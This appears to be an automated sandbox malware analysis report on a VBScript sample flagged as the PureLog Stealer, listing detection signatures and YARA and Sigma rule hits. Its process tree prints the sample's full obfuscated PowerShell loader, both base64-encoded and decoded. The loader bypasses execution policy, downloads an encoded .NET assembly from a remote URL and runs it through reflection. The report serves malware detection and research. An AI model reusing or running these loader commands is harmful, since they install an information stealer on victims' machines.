Windows
Analysis Report
ZJbugHcHda.vbs
Overview
General Information
Sample name: | ZJbugHcHda.vbs (renamed because the original name is a hash value) |
Original sample name: | 01b5377b8e2fd5cc88c57a2115fefc853ddecbf4aff300357391dcd803b7d67d.vbs |
Analysis ID: | 1523821 |
MD5: | 134f2e8115174dea5246b807fd0c8427 |
SHA1: | c47a738087706c17b345c8b93b8eb71c1518e3a8 |
SHA256: | 01b5377b8e2fd5cc88c57a2115fefc853ddecbf4aff300357391dcd803b7d67d |
Tags: | BlindEagle, vbs, user-JAMESWT_MHT |
Detection
PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6448, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ZJbugHcHda.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 6596, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbElkWzFdKyRTSEVsTGlEWzEzXSsneCcpICggKCd4UGl1cmwnKycgPScrJyBzJysna3JodHRwJysnczovLycrJ2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdicrJ2Uub3JnJysnLzI0L2l0JysnZScrJ21zL2RldGFoLScrJ25vdGUtJysndi9EZScrJ3RhaE5vdGVWJysnLnR4dHNrJysncjt4UGknKydiYScrJ3NlJysnNjRDbycrJ24nKyd0ZScrJ250ID0gKCcrJ05ldy1PYmplJysnY3QgUycrJ3lzdGVtLicrJ05ldC5XZWJDJysnbGknKydlbnQpLicrJ0Rvd25sJysnb2FkU3RyaW4nKydnKHhQaXVybCk7JysneFAnKydpJysnYmluYXJ5JysnQ29udGUnKydudCA9IFtTeXN0JysnZW0uQ29udmVydF06OkZyb21CJysnYScrJ3NlNjRTJysndHJpbicrJ2coeFBpJysnYmFzZTY0Q29udGUnKyduJysndCk7eFBpYXMnKydzZW1ibHkgPScrJyBbUmVmbGVjJysndCcrJ2knKydvbi5Bc3NlbWJseScrJ106JysnOkwnKydvYWQoJysneFBpYmluJysnYXInKyd5Q29udGVudCk7eFAnKydpdHknKydwZSA9IHgnKydQaWFzJysnc2VtJysnYicrJ2x5LkdlJysndFR5cCcrJ2Uoc2tyJysnUnUnKyduUCcrJ0UuSG9tZXNrcicrJyk7eFBpJysnbWUnKyd0aG9kID0geFBpdHknKydwZS5HZXRNZXQnKydobycrJ2QoJysnc2tyVkFJc2tyJysnKTt4UCcrJ2knKydtZXRob2QnKycuSW52Jysnb2tlKHhQaW51bGwnKycsJysnIFsnKydvYmplJysnY3RbXV1AJysnKHNrcnR4dC5LS1JPTksnKycvYmsvcHBtYXgnKycvODQyLjcnKycyJysnMi41NTIuNDMxLy86cCcrJ3R0aHNrciAsJysnICcrJ3MnKydrcmRlc2F0aXZhZG8nKydza3IgLCAnKydza3JkJysnZXNhdGl2JysnYWQnKydvcycrJ2snKydyICcrJywgc2tyZCcrJ2UnKydzYXRpdmFkb3Nrcixza3JSZScrJ2dBcycrJ21zaycrJ3Isc2tyc2tyKSknKS5SRVBsQWNFKCd4UGknLCckJykuUkVQbEFjRSgoW2NIQXJdMTE1K1tjSEFyXTEwNytbY0hBcl0xMTQpLFtTVHJpTkddW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6616, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7052, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllId[1]+$SHElLiD[13]+'x') ( ('xPiurl'+' ='+' s'+'krhttp'+'s://'+'ia600100'+'.us.'+'archiv'+'e.org'+'/24/it'+'e'+'ms/detah-'+'note-'+'v/De'+'tahNoteV'+'.txtsk'+'r;xPi'+'ba'+'se'+'64Co'+'n'+'te'+'nt = ('+'New-Obje'+'ct S'+'ystem.'+'Net.WebC'+'li'+'ent).'+'Downl'+'oadStrin'+'g(xPiurl);'+'xP'+'i'+'binary'+'Conte'+'nt = [Syst'+'em.Convert]::FromB'+'a'+'se64S'+'trin'+'g(xPi'+'base64Conte'+'n'+'t);xPias'+'sembly ='+' [Reflec'+'t'+'i'+'on.Assembly'+']:'+':L'+'oad('+'xPibin'+'ar'+'yContent);xP'+'ity'+'pe = x'+'Pias'+'sem'+'b'+'ly.Ge'+'tTyp'+'e(skr'+'Ru'+'nP'+'E.Homeskr'+');xPi'+'me'+'thod = xPity'+'pe.GetMet'+'ho'+'d('+'skrVAIskr'+');xP'+'i'+'method'+'.Inv'+'oke(xPinull'+','+' ['+'obje'+'ct[]]@'+'(skrtxt.KKRONK'+'/bk/ppmax'+'/842.7'+'2'+'2.552.431//:p'+'tthskr ,'+' '+'s'+'krdesativado'+'skr , '+'skrd'+'esativ'+'ad'+'os'+'k'+'r '+', skrd'+'e'+'sativadoskr ,skrRe'+'gAs'+'msk'+'r,skrskr))').REPlAcE('xPi','$').REPlAcE(([cHAr]115+[cHAr]107+[cHAr]114),[STriNG][cHAr]39))", MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
System Summary
Source: | Author: Florian Roth (Nextron Systems) |